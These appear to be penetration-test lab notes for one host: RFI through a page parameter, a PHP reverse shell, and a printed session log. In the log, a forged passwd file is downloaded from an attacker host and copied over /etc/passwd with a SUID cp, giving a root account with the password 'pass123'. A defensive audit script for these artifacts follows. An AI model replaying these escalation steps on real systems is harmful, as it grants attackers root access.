1011.1.35
RFI via the page parameter, found by manual probing. OS reverse shell, then privilege escalation through SUID cp.
```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
```
PHP: a really nice shell that can be used to spawn both a PHP-based shell and an OS-level shell.
```
linpeas.sh shadow shell.elf
rm shadow
rm: cannot remove 'shadow': Operation not permitted
ls
linpeas.sh shadow shell.elf
curl "http://192.168.119.129:80/passwd" -o passwd
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   979  100   979    0     0   8770      0 --:--:-- --:--:-- --:--:--  8819
ls
linpeas.sh passwd shadow shell.elf
cp passwd /etc/passwd
tail /etc/passwd
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
chiya:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash
su chiya
Password: pass123
ls
linpeas.sh passwd shadow shell.elf
whoami
root
cd /root
ls
anaconda-ks.cfg proof.txt
cat proof.txt
99d8f4f10cf80eed5cb67e73e8b60a3d
```
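The session above leaves two artifacts a defender can audit for: a non-root UID 0 account with a crypt hash stored directly in `/etc/passwd`, and a SUID `cp`. The following shell script is an added example, not part of the original notes; the function names and sample data are constructed, and checking `mv`, `dd` and `tee` alongside `cp` is an assumption that generalizes the SUID check.

```shell
#!/bin/sh
# Added example: audit for the artifacts left by the session above.

# audit_passwd FILE  (use "-" for stdin) -> one finding per line: "<REASON> <user>"
#   UID0_NOT_ROOT  : an account other than root has UID 0
#   HASH_IN_PASSWD : password field holds a crypt hash instead of x, * or !
#   EMPTY_PASSWORD : password field is empty (login without a password)
audit_passwd() {
    awk -F: '
        /^[ \t]*(#|$)/            { next }   # skip comments and blank lines
        NF < 7                    { print "MALFORMED " $1; next }
        $3 == 0 && $1 != "root"   { print "UID0_NOT_ROOT " $1 }
        $2 ~ /^\$/                { print "HASH_IN_PASSWD " $1 }
        $2 == ""                  { print "EMPTY_PASSWORD " $1 }
    ' "${1:--}"
}

# suid_file_tools DIR... -> paths of SUID file-writing utilities under DIR.
# A SUID cp lets any local user overwrite root-owned files such as /etc/passwd.
suid_file_tools() {
    find "$@" -xdev -type f -perm -4000 \
        \( -name cp -o -name mv -o -name dd -o -name tee \) 2>/dev/null
}

# Constructed sample modelled on the tail output above (hash is a placeholder).
sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
chiya:$1$EXAMPLESALT$CONSTRUCTEDPLACEHOLDER:0:0:root:/root:/bin/bash
EOF
}

# Demo on the constructed sample; on a real host run:
#   audit_passwd /etc/passwd
#   suid_file_tools /bin /usr/bin /usr/local/bin
sample_passwd | audit_passwd -
```

Any output from either function on a production host warrants investigation; on a clean CentOS install both return nothing.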